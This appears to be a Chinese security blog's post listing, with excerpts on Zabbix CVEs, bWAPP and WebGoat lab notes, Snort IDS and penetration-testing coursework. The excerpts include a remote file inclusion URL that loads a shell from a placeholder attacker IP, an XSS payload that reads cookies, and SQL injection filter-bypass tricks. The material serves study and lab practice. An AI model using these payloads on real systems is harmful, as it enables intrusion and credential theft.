- 博客(19)
- 收藏
- 关注
RSS订阅原创 CVE-2024-36467 Zabbix权限提升
在validateUpdate 函数中,调用了第 542 行第 1109 行的 checkHimself 函数。这段代码用于检查用户组权限,如果请求中包含 usrgrps(用户组变更),就从数据库查询这些组的 gui_access 和 users_status 字段。从以上代码可以看出用户只能修改自己的数据,在用户组变更时没有对用户的权限进行校验,只检查用户组的状态,因此用户可以将自己添加进任意组中。这段代码用于验证组的状态,如果处于禁用或禁止GUI访问状态,就会报错。(2)修改当前用户的用户组。
2025-05-26 21:43:00
390
原创 BWAP靶场日记
language=http://[attacker_ip]/shell.txt&cmd=[command],其中 [bwapp_ip] 是 bwapp 靶场的 IP 地址,[attacker_ip] 是攻击者服务器的 IP 地址,[command] 是要执行的命令,如 whoami。在XML 中 <>& 等字符是不能被直接存入的,因此注入前必须先进行 HTML 实体转义才行,如<img src = x onerror = alert(document.cookie)>。ajax是一个异步通讯。
2025-05-25 13:49:05
698
原创 IDS(入侵检测系统)原理和配置,以snort为例
入侵检测系统(Intrusion Detection System,简称IDS)是网络安全领域的一项关键技术,旨在检测和识别网络或系统中的不正常活动或潜在攻击。简单来说,IDS就像是数字世界中的“警报器”,能够实时监控网络流量、文件系统或操作系统的活动,及时发现并报告任何可疑行为。IDS的主要功能是对网络中传输的数据进行分析,识别其中可能存在的攻击行为,并通过报警或通知管理员来提醒潜在的安全威胁。入侵检测系统本身并不直接阻止攻击,而是通过监测、分析和报警的方式帮助网络安全团队及时响应。
2025-05-07 17:23:30
1166
原创 CVE-2024-42327:Zabbix认证后SQL注入漏洞
该漏洞存在于 user.get API 端点,任何拥有 API 访问权限的非管理员用户(包括默认的 “用户 ”角色)都可能利用该漏洞。通过操纵特定的 API 调用,攻击者可以注入恶意 SQL 代码,从而获得未经授权的访问权限和控制权。
2025-05-02 23:52:24
710
原创 docker折磨日记
虽然这个过程很曲折,但是对问题抽丝剥茧,一步步解决问题的经历让我充满成就感。即使在没有解决问题的时候心烦意燥的,但是成功解决问题的时候真的感觉酣畅淋漓。
2025-04-30 21:39:11
795
原创 恶意邮件识别
随着电子邮件的广泛应用,恶意邮件(如钓鱼邮件、勒索软件、垃圾邮件等)已成为网络安全的主要威胁之一。攻击者通过伪装成合法发件人、植入恶意附件或嵌入恶意链接,诱导用户泄露敏感信息或执行恶意代码。根据 2023年 Verizon 数据泄露调查报告,36% 的数据泄露事件涉及钓鱼邮件,而企业每年因恶意邮件导致的经济损失高达数十亿美元。传统的恶意邮件检测方法(如基于黑名单、关键词过滤、简单启发式规则)已难以应对日益复杂的攻击手段。
2025-04-16 18:52:42
798
原创 WebGoat靶场日记
(1)关键字内插入/**/(2)大小写绕过(3)双写绕过(删除关键字的情况)(4)内联注释绕过(mysql)(把一些特有的仅在MYSQL上的语句放在 /*!...*/ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中会执行)(5)关键字内插入<>(有些网站为了防止xss可能过滤<>)(6)and和or可以试试&&、||或者异或注入爆破服务器ip(CASE+WHEN(substring((SELECT+ip+FROM+servers+WHERE+hostname='webgoat-prd'),
2025-03-22 17:48:26
1014
原创 搭建LANMP平台
Nginx作为前端反向代理,处理所有静态文件请求(如 HTML、CSS、JS、图像等),并将动态请求转发到Apache。Apache负责处理 PHP 请求,并与MySQL结合进行数据库操作。这种方式的好处是利用 Nginx 的高效性能来处理静态内容,Apache 仍然能继续处理动态内容,从而提升系统的整体性能和灵活性。
2025-02-25 18:54:32
975
原创 基于Python+mysql+pyqt5开发社区门禁管理系统
基于MySQL+Python+PyQt5设计和实现的社区门禁物业管理系统。本系统使用QtDesigner和PyCharm进行开发,旨在提高社区安全性和物业管理效率。
2024-07-24 14:47:50
963
1
原创 个人复现任务
(2)将payload.exe移至靶机并运行(这里有两种方法,一种是直接复制粘贴,另一种是在kali中搭建一个网站,将payload.exe挂上去,靶机访问该网站并下载)1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。(1)将easy file sharing server安装在靶机上设置好端口(默认80端口可能会被占,可以改成8080),并运行。(2)将kali和靶机桥接,查看靶机的IP,用kali扫描靶机的端口服务。
2023-12-26 14:41:56
514
1
原创 网络渗透实验一
通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。目的IP地址为:202.193.64.34,回答问题:该用户使用的什么品牌的设备,访问的是什么网站?说明其中四个端口的提供的服务,查阅资料,简要说明该服务的功能。1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
2023-12-21 19:51:28
436
1
原创 网络渗透实验二
利用人们平时常用的词、句破译,如果说暴力破解是一个一个的尝试那么字典破译就是利用人们习惯用人名、地名或者常见的词语设置成密码的习惯进行破译。字典破译速度比暴力破译更快但是有时候密码设置中包含了没有字典库中的词句就无法破解出来了,因此有好的字典是关键。1.2 在互联网上找到任意一个以明文方式传递用户帐号、密码的网站,B是否能看到A和外网(该网站)的通信(A刚输入的帐户和口令)?以*****为目标网站,构造字典(wordlist),其中包含你的正确密码,那么,口令的明文是什么?安全的密码(口令)应遵循的原则。
2023-12-21 19:50:18
441
1
原创 为什么http会自动跳转到https
因为https是加密传输协议,比http更加安全,所以很多部署了https证书的网站,都会设置http自动跳转到https。今天访问学校官网,输入。
2023-12-04 12:13:51
756
原创 用wireshark抓包QQ图片
1.一定要注意将手机和电脑连接同一WIFI2.在过滤框输入ip.src==IP时尽量打完不然可能出错3.用WinHex修改后的文件要将后缀名改为.jpg后才能打开。
2023-11-20 20:35:33
976
1
原创 查看网络配置
1.Kali虚拟机采用桥接模式;物理机连接Guet-WiFi,Kali中查看网络配置并截图,能获得IP地址吗?2、Kali虚拟机采用桥接模式;物理机连接手机热点,Kali中查看网络配置并截图,能获得IP地址吗?然后物理机连接Guet-WIFI后,在Kali终端输入ifconfig查看网络配置。无法获得IP地址,因为校园网无法动态分配多个IP,所以在实验过程中无法连接网络。如果想在连接校园网的情况下得到IP地址需要手动配置静态IP地址。方法(1)查看物理机的IP地址信息。修改为物理机的DNS地址。
2023-11-10 21:11:26
101
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人